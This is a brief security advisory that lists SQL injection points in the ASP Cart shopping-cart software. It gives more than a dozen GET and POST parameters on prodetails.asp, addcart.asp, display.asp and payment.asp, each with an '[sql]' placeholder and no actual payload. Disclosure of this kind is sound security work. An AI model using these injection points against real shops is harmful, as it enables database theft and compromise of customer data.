SecurityvulnsSECURITYVULNS:DOC:15117ASP Cart [multiples injection sql (post & get)]
vendor site: http://www.aspcart.com
product: ASP Cart
bug: multiples injection sql post & get
global risk: high !
injection get :
http://site.com/prodetails.asp?prodid='[sql]
injection (post) :
1)http://site.com/display.asp
Variables:
/display.asp?page='[sql]
2)http://site.com/addcart.asp
Variables:
/addcart.asp?custid='[sql]
3)http://site.com/addcart.asp
Variables:
/addcart.asp?custid=1&item='[sql]
4)http://site.com/addcart.asp
Variables:
/addcart.asp?custid=1&item=prout&price='[sql]
5)http://site.com/addcart.asp
Variables:
/addcart.asp?custid=1&item=prout&price=5666&custom='[sql]
6)http://site.com/addcart.asp
Variables:
/addcart.asp?custid=1&item=prout&price=5666&custom=yes&department='[sql]
7)http://site.com/addcart.asp
Variables:
/addcart.asp?custid=1&item=prout&price=5666&custom=yes&department=1289&start='[sql]
8)http://site.com/addcart.asp
Variables:
/addcart.asp?custid=1&item=prout&price=5666&custom=yes&department=1
289&start=1&quantity='[sql]
9)http://site.com/addcart.asp
Variables:
/addcart.asp?custid=1&item=prout&price=5666&custom=yes&department=1
289&start=1&quantity=1&submit='[sql]
10)http://site.com/addcart.asp
Variables:
/addcart.asp?custid=1&item=prout&price=5666&custom=yes&department=1
289&start=1&quantity=1&submit=1&custom1='[sql]
11)http://site.com/addcart.asp
Variables:
/addcart.asp?custid=1&item=prout&price=5666&custom=yes&department=1
289&start=1&quantity=1&submit=1&custom1=1&custom2='[sql]
12)http://site.com/addcart.asp
Variables:
/addcart.asp?custid=1&item=prout&price=5666&custom=yes&department=1
289&start=1&quantity=1&submit=1&custom1=1&custom2=1&custom3='[sql]
12)http://site.com/payment.asp
Variables:
/payment.asp?customerid='[sql]
laurent gaffie & benjamin mosse
http://s-a-p.ca/
contact: [email protected]